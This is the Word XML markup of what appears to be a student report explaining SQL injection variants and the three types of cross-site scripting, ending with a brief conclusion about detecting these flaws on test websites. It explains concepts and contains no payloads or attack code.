    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Submitting payloads designed to trigger time delays when executed within an SQL query, and looking for differences in the time taken to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL injection in different parts of the query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>Most SQL injection vulnerabilities arise within the </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:t> clause of a </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:t> query. This type of SQL injection is generally well-understood by experienced testers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>But SQL injection vulnerabilities can in principle occur at any location within the query, and within different query types. The most common other locations where SQL injection arises are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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In </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> statements, within the updated values or the </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> clause.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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In </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> statements, within the inserted values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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In </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> statements, within the table or column name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="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In </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> statements, within the </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> clause.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Second-order SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:lastRenderedPageBreak/>
        <w:t>First-order SQL injection arises where the application takes user input from an HTTP request and, in the course of processing that request, incorporates the input into an SQL query in an unsafe way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>In second-order SQL injection (also known as stored SQL injection), the application takes user input from an HTTP request and stores it for future use. This is usually done by placing the input into a database, but no vulnerability arises at the point where the data is stored. Later, when handling a different HTTP request, the application retrieves the stored data and incorporates it into an SQL query in an unsafe way.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Second-order SQL injection often arises in situations where developers are aware of SQL injection vulnerabilities, and so safely handle the initial placement of the input into the database. When the data is later processed, it is deemed to be safe, since it was previously placed into the database safely. At this point, the data is handled in an unsafe way, because the developer wrongly deems it to be trusted.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="00D228D6" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Database-specific factors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>Some core features of the SQL language are implemented in the same way across popular database platforms, and so many ways of detecting and exploiting SQL injection vulnerabilities work identically on different types of database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:t>However, there are also many differences between common databases. These mean that some techniques for detecting and exploiting SQL injection work differently on different platforms. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Syntax for string concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Comments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Batched (or stacked) queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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Platform-specific APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620884" w:rsidRPr="009F6965" w:rsidRDefault="00620884" w:rsidP="00D228D6">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9F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00363D4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00363D4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00363D4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363D4E" w:rsidRPr="00363D4E" w:rsidRDefault="00363D4E" w:rsidP="00363D4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00363D4E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidRPr="00363D4E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D228D6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00363D4E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRPr="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2B3033"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:color w:val="2B3033"/>
        </w:rPr>
        <w:t>There are three different forms of XSS sub-classes of vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363D4E" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2B3033"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2B3033"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:color w:val="2B3033"/>
        </w:rPr>
        <w:t>: This is the most common XSS vulnerabilities which occur when an internet user makes a request, and the server does not send back a safe response to the browser. The attack is only active during that specific request, requiring the attacker to find a means of distribution, for example via email, or links from other websites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored XXS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indifference of the reflected category which requires an external means of delivery, the Stored or Persistent XSS is the result of user input stored in the application. Stored XSS have the same impacts as reflected ones, with the difference that an attacker can place those into the application and then do not have to distribute the attack to any potential victims actively. If this occurs in a jam-packed website page, the distribution will be fast and have a high impact. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRPr="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D228D6" w:rsidRPr="00D228D6" w:rsidRDefault="00D228D6" w:rsidP="00D228D6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2B3033"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D228D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DOM XSS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D228D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D228D6">
        <w:t>DOM,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D228D6">
        <w:t xml:space="preserve"> or “Document Object Model” is the representation of a website in within a browser. It is changed and modified by dynamic content, and via vulnerabilities in those modifications. The DOM-based attacks do not need to interact with the web server, making traditional active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D228D6">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D228D6">
        <w:t>, such as web application firewalls, useless.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001076B8" w:rsidRDefault="009A7287" w:rsidP="001076B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="001076B8" w:rsidRDefault="001076B8" w:rsidP="001076B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1518"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                           V. </w:t>
      </w:r>
      <w:r w:rsidR="009A7287" w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="001076B8" w:rsidRDefault="00044341">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>We detected the SQL Injection attacks on L</w:t>
      </w:r>
      <w:r w:rsidR="00DD6777" w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> website and Cross-site Scripting attacks on testphp.vulnweb.com </w:t>
      </w:r>
      <w:r w:rsidR="009A7287" w:rsidRPr="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="00892735" w:rsidRDefault="009A7287" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00892735">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
